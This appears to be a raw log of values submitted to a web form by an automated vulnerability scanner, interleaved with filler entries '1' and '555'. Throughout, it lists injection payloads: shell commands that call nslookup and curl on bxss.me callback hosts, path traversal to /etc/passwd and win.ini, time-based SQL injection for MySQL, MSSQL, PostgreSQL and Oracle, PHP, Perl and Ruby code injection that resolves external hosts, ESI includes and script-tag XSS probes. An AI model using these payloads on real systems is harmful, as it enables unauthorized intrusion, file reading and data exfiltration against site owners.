1|echo utbrtb$()\ snztgc\nz^xyu||a #' |echo utbrtb$()\ snztgc\nz^xyu||a #|" |echo utbrtb$()\ snztgc\nz^xyu||a #
555
1
555
1
555
1
555
expr 9000380932 - 970493
555
1
555
1
555
1
555
(nslookup -q=cname hitxwseozqmne9715d.bxss.me||curl hitxwseozqmne9715d.bxss.me))
555
1
555
1
555
1
555
$(nslookup -q=cname hitagttlvjezzdf750.bxss.me||curl hitagttlvjezzdf750.bxss.me)
555
1
555
1
555
1
555
&nslookup -q=cname hitaiqzyishzv98e81.bxss.me&'\"`0&nslookup -q=cname hitaiqzyishzv98e81.bxss.me&`'
555
1
555
1
555
../../../../../../../../../../../../../../etc/passwd
555
&(nslookup -q=cname hitxmlyirnlnce91b1.bxss.me||curl hitxmlyirnlnce91b1.bxss.me)&'\"`0&(nslookup -q=cname hitxmlyirnlnce91b1.bxss.me||curl hitxmlyirnlnce91b1.bxss.me)&`'
555
1
555
|(nslookup -q=cname hitjhynzaxpnid7958.bxss.me||curl hitjhynzaxpnid7958.bxss.me)
555
1<esi:include src="http://bxss.me/rpb.png"/>
555
1
555
../../../../../../../../../../../../../../windows/win.ini
555<esi:include src="http://bxss.me/rpb.png"/>
1
555
1
555
`(nslookup -q=cname hitbffxugpmpc7bdef.bxss.me||curl hitbffxugpmpc7bdef.bxss.me)`
555
file:///etc/passwd
555
1
555
;(nslookup -q=cname hitbgqwmryvdh0e359.bxss.me||curl hitbgqwmryvdh0e359.bxss.me)|(nslookup -q=cname hitbgqwmryvdh0e359.bxss.me||curl hitbgqwmryvdh0e359.bxss.me)&(nslookup -q=cname hitbgqwmryvdh0e3
555
1
555
1
555
1
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitxyrbflyaoya0b59.bxss.me||curl${IFS}hitxyrbflyaoya0b59.bxss.me)
555
1
555
../1
555
1
555
1
../../../../../../../../../../../../../../etc/passwd
1
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitdnkrjzeovp32374.bxss.me||curl${IFS}hitdnkrjzeovp32374.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitdnkrjzeovp32374.bxss.me||curl${IFS}h
555
1
555
1
../../../../../../../../../../../../../../windows/win.ini
1
echo snkhro$()\ qlpcef\nz^xyu||a #' &echo snkhro$()\ qlpcef\nz^xyu||a #|" &echo snkhro$()\ qlpcef\nz^xyu||a #
1
555
1
555
1
&echo nxckdz$()\ yomrzl\nz^xyu||a #' &echo nxckdz$()\ yomrzl\nz^xyu||a #|" &echo nxckdz$()\ yomrzl\nz^xyu||a #
1
555
${9999678+9999302}
file:///etc/passwd
1
555
1
555&echo napdok$()\ wbndbq\nz^xyu||a #' &echo napdok$()\ wbndbq\nz^xyu||a #|" &echo napdok$()\ wbndbq\nz^xyu||a #
1
555
1
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
${9999758+9999558}
1
../555
1
555
';print(md5(31337));$a='
|echo nevagm$()\ utwmsq\nz^xyu||a #' |echo nevagm$()\ utwmsq\nz^xyu||a #|" |echo nevagm$()\ utwmsq\nz^xyu||a #
1
555
1
555
";print(md5(31337));$a="
555
1
555|echo yzaemr$()\ hynvjt\nz^xyu||a #' |echo yzaemr$()\ hynvjt\nz^xyu||a #|" |echo yzaemr$()\ hynvjt\nz^xyu||a #
1
555
${@print(md5(31337))}
555
1
555
1
555
${@print(md5(31337))}\
expr 9000747643 - 988914
1
555
'.print(md5(31337)).'
555
1
555
1
555
1
555
1
(nslookup -q=cname hitnaklsliuua64750.bxss.me||curl hitnaklsliuua64750.bxss.me))
1
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1
555
1
555
1
$(nslookup -q=cname hitufmohteevadb502.bxss.me||curl hitufmohteevadb502.bxss.me)
1
';print(md5(31337));$a='
1
555
1
555
1
&nslookup -q=cname hityavsrqpnttbdbf4.bxss.me&'\"`0&nslookup -q=cname hityavsrqpnttbdbf4.bxss.me&`'
1
";print(md5(31337));$a="
1
555
'.gethostbyname(lc('hithm'.'vzodlqpu8d625.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(73).chr(108).chr(72).'
&(nslookup -q=cname hitsxufzufyuq8fce7.bxss.me||curl hitsxufzufyuq8fce7.bxss.me)&'\"`0&(nslookup -q=cname hitsxufzufyuq8fce7.bxss.me||curl hitsxufzufyuq8fce7.bxss.me)&`'
1
555
1
555
".gethostbyname(lc("hitiv"."srjhqook7ca69.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(67).chr(115).chr(76)."
${@print(md5(31337))}
1
555
gethostbyname(lc('hitbt'.'azwctiddbfa4b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(71).chr(113).chr(70)
|(nslookup -q=cname hitsruankypty0a7a7.bxss.me||curl hitsruankypty0a7a7.bxss.me)
1
${@print(md5(31337))}\
1
'.gethostbyname(lc('hitwn'.'omviarntb7353.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(68).chr(101).chr(87).'
1
555
1
`(nslookup -q=cname hitincbhcbsflad926.bxss.me||curl hitincbhcbsflad926.bxss.me)`
1
'.print(md5(31337)).'
1
;(nslookup -q=cname hitrcpyjodalte1a8d.bxss.me||curl hitrcpyjodalte1a8d.bxss.me)|(nslookup -q=cname hitrcpyjodalte1a8d.bxss.me||curl hitrcpyjodalte1a8d.bxss.me)&(nslookup -q=cname hitrcpyjodalte1a8d.bxss.me||curl hitrcpyjodalte1a8d.bxss.me)
1
555
1
".gethostbyname(lc("hitnd"."hguplonkf86d8.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(76).chr(99).chr(80)."
1
555
1
|(nslookup${IFS}-q${IFS}cname${IFS}hitljobhwgwdo89a8d.bxss.me||curl${IFS}hitljobhwgwdo89a8d.bxss.me)
1
555
1
555
1
&(nslookup${IFS}-q${IFS}cname${IFS}hitrpdlkpohfz2a314.bxss.me||curl${IFS}hitrpdlkpohfz2a314.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitrpdlkpohfz2a314.bxss.me||curl${IFS}hitrpdlkpohfz2a314.bxss.me)&`'
1
gethostbyname(lc('hiton'.'fwyfwqzbc7399.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(88).chr(107).chr(75)
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
HttP://bxss.me/t/xss.html?%00
555
1
555
1
555
bxss.me/t/xss.html?%00
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
555
1
HttP://bxss.me/t/xss.html?%00
1
555
1
555
/etc/shells
555
1
555
1
bxss.me/t/xss.html?%00
1
555
../../../../../../../../../../../../../../etc/shells
555
1
555
1
555
1
555
1
555
c:/windows/win.ini
555
1
555
1
555
1
555
bxss.me
555
1
555
Http://bxss.me/t/fit.txt
555
1
555
1
555
http://bxss.me/t/fit.txt?.jpg
555
1
555
1
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
1
555
1
555
1
555
1
555
1
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
1
555
1
555
1
/etc/shells
1
555
1
555
1
../../../../../../../../../../../../../../etc/shells
1
555
1
555
1
555
1
555
1
c:/windows/win.ini
1
555
1
555
1
555
1
555
1
555
1
bxss.me
1
555
1dvCH02lv
555
1
555
"+"A".concat(70-3).concat(22*4).concat(114).concat(68).concat(116).concat(87)+(require"socket" Socket.gethostbyname("hitqx"+"ocvqiwbra99be.bxss.me.")[3].to_s)+&
Http://bxss.me/t/fit.txt
1
555
'+'A'.concat(70-3).concat(22*4).concat(112).concat(85).concat(110).concat(89)+(require'socket' Socket.gethostbyname('hitim'+'degrbqisfdacd.bxss.me.')[3].to_s)+&
555
depoimentos
555
1
http://bxss.me/t/fit.txt?.jpg
1
555
'A'.concat(70-3).concat(22*4).concat(98).concat(73).concat(98).concat(68)+(require'socket' Socket.gethostbyname('hitdb'+'rocqqkcg58624.bxss.me.')[3].to_s)
555
depoimentos
555
1
"+"A".concat(70-3).concat(22*4).concat(99).concat(81).concat(111).concat(65)+(require"socket" Socket.gethostbyname("hitkz"+"bozpdkrr3331b.bxss.me.")[3].to_s)+"
1
555
1
555
depoimentos/.
'+'A'.concat(70-3).concat(22*4).concat(116).concat(90).concat(110).concat(90)+(require'socket' Socket.gethostbyname('hitzf'+'plaeyafv7e76c.bxss.me.')[3].to_s)+'
1
555
1
555
1
depoimentos
1
555
1
555
1
depoimentos
1
'A'.concat(70-3).concat(22*4).concat(106).concat(84).concat(97).concat(65)+(require'socket' Socket.gethostbyname('hitjm'+'brwskegbd5aec.bxss.me.')[3].to_s)
1
555
1
555
1
depoimentos/.
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
redirtest.acx
555
1
redirtest.acx
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1&n942954=v901316
555
1
555
1
555
1
555
)
555
1
555
1
555&n936269=v962260
1
555
1
555
1
555
!(()&&!|*|*|
555
555
1
555
1
555
^(#$!@#$)(()))******
555
1
)
1
555
1
555
1
555
1
!(()&&!|*|*|
1
555
1
555
1
^(#$!@#$)(()))******
1
555
555
-1 OR 5*5=25 --
555
1
555
1
555
1
555
1
555
-1 OR 5*5=25
555
1
555
1
555
1
555
-1' OR 5*5=25 --
555
1
555
1
555
1
555
1
555
-1" OR 5*5=25 --
555
555
1
555
-1' OR 5*5=25 or '7rKBcQTh'='
555
1
555
1
555
'"()
555
1
555
-1" OR 5*5=25 or "zuuq7u87"="
555
1
555
1
555
1
555
1'&&sleep(27*1000)*hwhcbw&&'
555
1
555
1
555
1
555
1
555
1"&&sleep(27*1000)*xzlxuy&&"
555
1
555
1
555
1
555
1'||sleep(27*1000)*mzwiub||'
555
1
555
1
555
1
555
1
555
1"||sleep(27*1000)*pjlkae||"
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
'"()
1
555
1
555
1
555
1*if(now()=sysdate(),sleep(15),0)
555'&&sleep(27*1000)*arhdrn&&'
1
555
1
555"&&sleep(27*1000)*kisqud&&"
1
555
1
555
1
555
1
555
1
555
1
555'||sleep(27*1000)*kzodzn||'
1
555
1
555
1
555
1
555
1
555"||sleep(27*1000)*toghlz||"
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
1
555
1
555
1
555
1
555
1-1; waitfor delay '0:0:15' --
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1-1); waitfor delay '0:0:15' --
555
1
555
1
555
1
555
1
555
1-1 waitfor delay '0:0:15' --
555
1
555
1
555
1
555
1
555
1
555
1b0NkCUhk'; waitfor delay '0:0:15' --
555
1
555
1
555
1
555
1-1 OR 13=(SELECT 13 FROM PG_SLEEP(15))--
555
1-1) OR 660=(SELECT 660 FROM PG_SLEEP(15))--
555
1-1)) OR 237=(SELECT 237 FROM PG_SLEEP(15))--
555
1yNOLgUKO' OR 284=(SELECT 284 FROM PG_SLEEP(15))--
555
1Q0HCcqXa') OR 184=(SELECT 184 FROM PG_SLEEP(15))--
555
1QRZAuv2E')) OR 539=(SELECT 539 FROM PG_SLEEP(15))--
555
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
1
555
1'"
555
1????%2527%2522\'\"
555
@@YBWff
555
(select 198766*667891)
555
(select 198766*667891 from DUAL)
555
1
555
1
555iOQE0Bzl
1
555
1
-1 OR 5*5=25 --
1
-1 OR 5*5=25
1
-1' OR 5*5=25 --
1
-1" OR 5*5=25 --
1
-1' OR 5*5=25 or 'H9xBvN2z'='
1
-1" OR 5*5=25 or "RzM0adJ0"="
1
555*if(now()=sysdate(),sleep(15),0)
1
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
1
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
1
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1
555-1; waitfor delay '0:0:15' --
1
555-1); waitfor delay '0:0:15' --
1
555-1 waitfor delay '0:0:15' --
1
555kVyW7j4J'; waitfor delay '0:0:15' --
1
555-1 OR 968=(SELECT 968 FROM PG_SLEEP(15))--
1
555-1) OR 694=(SELECT 694 FROM PG_SLEEP(15))--
1
555-1)) OR 627=(SELECT 627 FROM PG_SLEEP(15))--
1
555r5I3IJES' OR 545=(SELECT 545 FROM PG_SLEEP(15))--
1
555rzeUMrNt') OR 186=(SELECT 186 FROM PG_SLEEP(15))--
1
555WMl7DlFl')) OR 540=(SELECT 540 FROM PG_SLEEP(15))--
1
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1
555
1
555'"
1
555????%2527%2522\'\"
1
@@F80dN
1
(select 198766*667891)
1
(select 198766*667891 from DUAL)
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
555
xfs.bxss.me
555
1
xfs.bxss.me
1
555
1
555
'"
555
1
555
1
555
1
555
<!--
555
1
555
1'"()&%<zzz><ScRiPt >LjGv(9348)</ScRiPt>
'"
1
555
1
555
1
555
'"()&%<zzz><ScRiPt >LjGv(9728)</ScRiPt>
555
1
555
1
555
1
<!--
1
555
1
555
555
19125035
555
1
555'"()&%<zzz><ScRiPt >LjGv(9115)</ScRiPt>
1
555
1
555
1
555
12345'"\'\");|]*{ <>?''????
'"()&%<zzz><ScRiPt >LjGv(9507)</ScRiPt>
1
555
1
555
response.write(9945055*9966852)
555
5559704552
1
555
1
555
'+response.write(9945055*9966852)+'
12345'"\'\");|]*{ <>?''????
1
555
1
555
1
555
1
555
"+response.write(9945055*9966852)+"
555
1
555
1
555
1
response.write(9416986*9252924)
1
555
1
555
1
'+response.write(9416986*9252924)+'
1
555
1
555
1
555
1
555
1
"+response.write(9416986*9252924)+"
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
echo fgiuev$()\ aqdcdo\nz^xyu||a #' &echo fgiuev$()\ aqdcdo\nz^xyu||a #|" &echo fgiuev$()\ aqdcdo\nz^xyu||a #
555
1
555
1
555
1
555
1
555
&echo zzeodk$()\ gyuque\nz^xyu||a #' &echo zzeodk$()\ gyuque\nz^xyu||a #|" &echo zzeodk$()\ gyuque\nz^xyu||a #
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1&echo qhfzuo$()\ bgbjab\nz^xyu||a #' &echo qhfzuo$()\ bgbjab\nz^xyu||a #|" &echo qhfzuo$()\ bgbjab\nz^xyu||a #
555
1
555
|echo lzgxsi$()\ zhrjju\nz^xyu||a #' |echo lzgxsi$()\ zhrjju\nz^xyu||a #|" |echo lzgxsi$()\ zhrjju\nz^xyu||a #
555
1
555
1
555
1
555
1|echo rzdeou$()\ oxgvdn\nz^xyu||a #' |echo rzdeou$()\ oxgvdn\nz^xyu||a #|" |echo rzdeou$()\ oxgvdn\nz^xyu||a #
555
1
555
1
555
expr 9000862367 - 936681
555
1
555
(nslookup -q=cname hitcsjrffqozuc1402.bxss.me||curl hitcsjrffqozuc1402.bxss.me))
555
1
555
1
555
1
555
$(nslookup -q=cname hitdulpyqaddc88d1d.bxss.me||curl hitdulpyqaddc88d1d.bxss.me)
555
1
555
&nslookup -q=cname hitnhygcnqkivd7ca0.bxss.me&'\"`0&nslookup -q=cname hitnhygcnqkivd7ca0.bxss.me&`'
555
1
555
1
555
1
555
1
555
&(nslookup -q=cname hitlowoinbgfoeee9a.bxss.me||curl hitlowoinbgfoeee9a.bxss.me)&'\"`0&(nslookup -q=cname hitlowoinbgfoeee9a.bxss.me||curl hitlowoinbgfoeee9a.bxss.me)&`'
555
1
555
1
555
|(nslookup -q=cname hiticymkllrhk83b5b.bxss.me||curl hiticymkllrhk83b5b.bxss.me)
555
1
555
1
555
1
555
1
555
`(nslookup -q=cname hitlrdgtaahpo33df3.bxss.me||curl hitlrdgtaahpo33df3.bxss.me)`
555
1
555
1
555
1
555
;(nslookup -q=cname hitcfqirxyslhffa23.bxss.me||curl hitcfqirxyslhffa23.bxss.me)|(nslookup -q=cname hitcfqirxyslhffa23.bxss.me||curl hitcfqirxyslhffa23.bxss.me)&(nslookup -q=cname hitcfqirxyslhffa
555
92UFK1Tf
555
1
555
1
555
1
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitkgtmqnqucw3390f.bxss.me||curl${IFS}hitkgtmqnqucw3390f.bxss.me)
555
1
555
cBYrEZqg: hmAz85eB
555
1
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitagwrirafgia4a85.bxss.me||curl${IFS}hitagwrirafgia4a85.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitagwrirafgia4a85.bxss.me||curl${IFS}h
555
1
c7Gj9G85
1
555
1
555
1
ETNsrP8Z: CmCuST76
1
555
1
echo loiivd$()\ tjaznx\nz^xyu||a #' &echo loiivd$()\ tjaznx\nz^xyu||a #|" &echo loiivd$()\ tjaznx\nz^xyu||a #
1
555
1zm7Snef2
555
../../../../../../../../../../../../../../etc/passwd
555
1
&echo plcchy$()\ xiludb\nz^xyu||a #' &echo plcchy$()\ xiludb\nz^xyu||a #|" &echo plcchy$()\ xiludb\nz^xyu||a #
1
555
1
555
1
555&echo bmthyy$()\ revxxk\nz^xyu||a #' &echo bmthyy$()\ revxxk\nz^xyu||a #|" &echo bmthyy$()\ revxxk\nz^xyu||a #
1
555
../../../../../../../../../../../../../../windows/win.ini
555
1
|echo wqxbgy$()\ gqblxk\nz^xyu||a #' |echo wqxbgy$()\ gqblxk\nz^xyu||a #|" |echo wqxbgy$()\ gqblxk\nz^xyu||a #
1
555
1
555
1
555
file:///etc/passwd
555
1
555
1
555|echo ooyyuk$()\ cetpib\nz^xyu||a #' |echo ooyyuk$()\ cetpib\nz^xyu||a #|" |echo ooyyuk$()\ cetpib\nz^xyu||a #
1
555
1
555
1
expr 9000836510 - 932362
1
555
../1
555
1
(nslookup -q=cname hitgxwmjlbocw946f9.bxss.me||curl hitgxwmjlbocw946f9.bxss.me))
1
555
1
../../../../../../../../../../../../../../etc/passwd
1
555
1
555
1
$(nslookup -q=cname hitmuoyzhoyca3af14.bxss.me||curl hitmuoyzhoyca3af14.bxss.me)
1
../../../../../../../../../../../../../../windows/win.ini
1
555
1
555
1
&nslookup -q=cname hitdzdlnxreyzb89f5.bxss.me&'\"`0&nslookup -q=cname hitdzdlnxreyzb89f5.bxss.me&`'
1
file:///etc/passwd
1
555
1
555
1
555
1
555
1
../555
1
&(nslookup -q=cname hitzcbznuciqs1d0b0.bxss.me||curl hitzcbznuciqs1d0b0.bxss.me)&'\"`0&(nslookup -q=cname hitzcbznuciqs1d0b0.bxss.me||curl hitzcbznuciqs1d0b0.bxss.me)&`'
1
555
1
555
1
555
1
555
1
555
1
555
1
|(nslookup -q=cname hitdqzbrfbfhtdf945.bxss.me||curl hitdqzbrfbfhtdf945.bxss.me)
1
555
1
555
1
`(nslookup -q=cname hitsiagydvpise4bc3.bxss.me||curl hitsiagydvpise4bc3.bxss.me)`
1
555
1
555
1
;(nslookup -q=cname hitzuolovgpyy8090e.bxss.me||curl hitzuolovgpyy8090e.bxss.me)|(nslookup -q=cname hitzuolovgpyy8090e.bxss.me||curl hitzuolovgpyy8090e.bxss.me)&(nslookup -q=cname hitzuolovgpyy8090e.bxss.me||curl hitzuolovgpyy8090e.bxss.me)
1
555
-1 OR 5*5=25 --
555
1
555
1
|(nslookup${IFS}-q${IFS}cname${IFS}hitqqxsgngpkx21f5c.bxss.me||curl${IFS}hitqqxsgngpkx21f5c.bxss.me)
1
555
1
555
-1 OR 5*5=25
555
${9999106+9999260}
&(nslookup${IFS}-q${IFS}cname${IFS}hitnqxldgtjvt46647.bxss.me||curl${IFS}hitnqxldgtjvt46647.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitnqxldgtjvt46647.bxss.me||curl${IFS}hitnqxldgtjvt46647.bxss.me)&`'
1
555
1<esi:include src="http://bxss.me/rpb.png"/>
555
1
555
1
555
-1' OR 5*5=25 --
${9999000+9999320}
1
555
1
555<esi:include src="http://bxss.me/rpb.png"/>
1
555
-1" OR 5*5=25 --
555
1
555
1
555
1
555
1
555
-1' OR 5*5=25 or 'sk7kq9On'='
555
1
555
1
555
1
555
1
555
1
555
1
555
-1" OR 5*5=25 or "ZBaRpTpy"="
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
1
555
1
555
'.gethostbyname(lc('hitfn'.'hulqpsat68c68.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(73).chr(101).chr(78).'
555
1
555
1
555
".gethostbyname(lc("hitev"."kblytksi6749a.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(88).chr(116).chr(78)."
555
';print(md5(31337));$a='
555
1
555
1
555
gethostbyname(lc('hitwc'.'qknzmnjy95ff2.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(81).chr(108).chr(79)
555
1
555
1
555
";print(md5(31337));$a="
555
1
'.gethostbyname(lc('hitah'.'xwehuazd49d1b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(74).chr(119).chr(71).'
1
555
1
555
${@print(md5(31337))}
".gethostbyname(lc("hitta"."jztnhkrze7f09.bxss.me."))."A".chr(67).chr(hex("58")).chr(113).chr(68).chr(122).chr(66)."
1
555
1
555
${@print(md5(31337))}\
555
1
gethostbyname(lc('hitzg'.'iprpautdb2fff.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(83).chr(105).chr(81)
1
555
'.print(md5(31337)).'
555
1
555
1
555
1
555
1*if(now()=sysdate(),sleep(15),0)
555
1
555
1
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1
555
1
555
1
555
1
';print(md5(31337));$a='
1
555
1
555
1
";print(md5(31337));$a="
1
555
1
555
1
${@print(md5(31337))}
1
555
1
555
1
${@print(md5(31337))}\
1
555
1
555
1
555
1
555
1
'.print(md5(31337)).'
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
1
555
1
555
1
555
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
555
1
555
1
555
1
555
1
555
/etc/shells
555
1
555
1
555
1
555
1
555
1
555
../../../../../../../../../../../../../../etc/shells
555
1
555
1
555
1
555
c:/windows/win.ini
555
1
555
HttP://bxss.me/t/xss.html?%00
555
1
555
1
555
1
555
bxss.me
555
bxss.me/t/xss.html?%00
555
1
555
1
HttP://bxss.me/t/xss.html?%00
1
555
Http://bxss.me/t/fit.txt
555
"+"A".concat(70-3).concat(22*4).concat(122).concat(79).concat(104).concat(87)+(require"socket" Socket.gethostbyname("hitxw"+"mhjrdojpefd45.bxss.me.")[3].to_s)+&
555
1
555
1
555
1
555
'+'A'.concat(70-3).concat(22*4).concat(115).concat(66).concat(107).concat(68)+(require'socket' Socket.gethostbyname('hitfp'+'dxvibwcd2b7a2.bxss.me.')[3].to_s)+&
555
http://bxss.me/t/fit.txt?.jpg
bxss.me/t/xss.html?%00
1
555
1
555
'A'.concat(70-3).concat(22*4).concat(97).concat(86).concat(110).concat(67)+(require'socket' Socket.gethostbyname('hithr'+'mcsewziw384d6.bxss.me.')[3].to_s)
555
1
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
1
555
1
"+"A".concat(70-3).concat(22*4).concat(115).concat(81).concat(113).concat(86)+(require"socket" Socket.gethostbyname("hitlu"+"cmvzlwcs35ae9.bxss.me.")[3].to_s)+"
1
555
1
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
1
555
1
555
1
'+'A'.concat(70-3).concat(22*4).concat(99).concat(71).concat(109).concat(83)+(require'socket' Socket.gethostbyname('hitqk'+'ahdqehph0bf1a.bxss.me.')[3].to_s)+'
1
555
1
555
1
'A'.concat(70-3).concat(22*4).concat(99).concat(72).concat(106).concat(74)+(require'socket' Socket.gethostbyname('hitju'+'jzllfxnq3750d.bxss.me.')[3].to_s)
1
/etc/shells
1
555
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
555
1
555
1
555
1
555
1
555
1
../../../../../../../../../../../../../../etc/shells
1
555
1
555
1
555
1
c:/windows/win.ini
1
555
1
555
1
bxss.me
1
555
1
Http://bxss.me/t/fit.txt
1
555
1
http://bxss.me/t/fit.txt?.jpg
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
depoimentos
555
1
555
1
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
depoimentos
555
1
555
1
555
1
555
1
555
1
555
depoimentos/.
555
1
555
1
555
1
555
1
depoimentos
1
555
1
555
1
555
1
555
1
555
1
depoimentos
1
555
1
555
1
555
1
555
1
555
1
depoimentos/.
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
redirtest.acx
555
1-1; waitfor delay '0:0:15' --
555
1
555
1
555
1
555
1
555
1
555
1
redirtest.acx
1
555
1&n963385=v948977
555
1
555
1
555
1
555&n931724=v976537
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
)
555
1
555
1
555
1
555
!(()&&!|*|*|
555
555
1
555
1
555
1
555
1
555
1
555
1-1); waitfor delay '0:0:15' --
555
1
555
^(#$!@#$)(()))******
555
555
1
555
1
555
1
)
1
555
1
555
1
555
555
1
!(()&&!|*|*|
1
555
1
555
1
555
1
555
'"()
555
1
555
1
555
1'&&sleep(27*1000)*rqwhmq&&'
^(#$!@#$)(()))******
1
555
1
555
1
555
1"&&sleep(27*1000)*xoktxx&&"
555
1
555
1
555
1
555
1'||sleep(27*1000)*sqysgb||'
555
1
555
1
555
1
555
1"||sleep(27*1000)*huktkj||"
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
'"()
1
555
1
555
1
555
1
555
1-1 waitfor delay '0:0:15' --
555'&&sleep(27*1000)*lgmcnu&&'
1
555
1
555
1
555
1
555"&&sleep(27*1000)*uxblio&&"
1
555
1
555
1
555'||sleep(27*1000)*ikyznp||'
1
555
1
555
1
555
1
555"||sleep(27*1000)*udwjdg||"
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1gmz99mdY'; waitfor delay '0:0:15' --
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1-1 OR 432=(SELECT 432 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
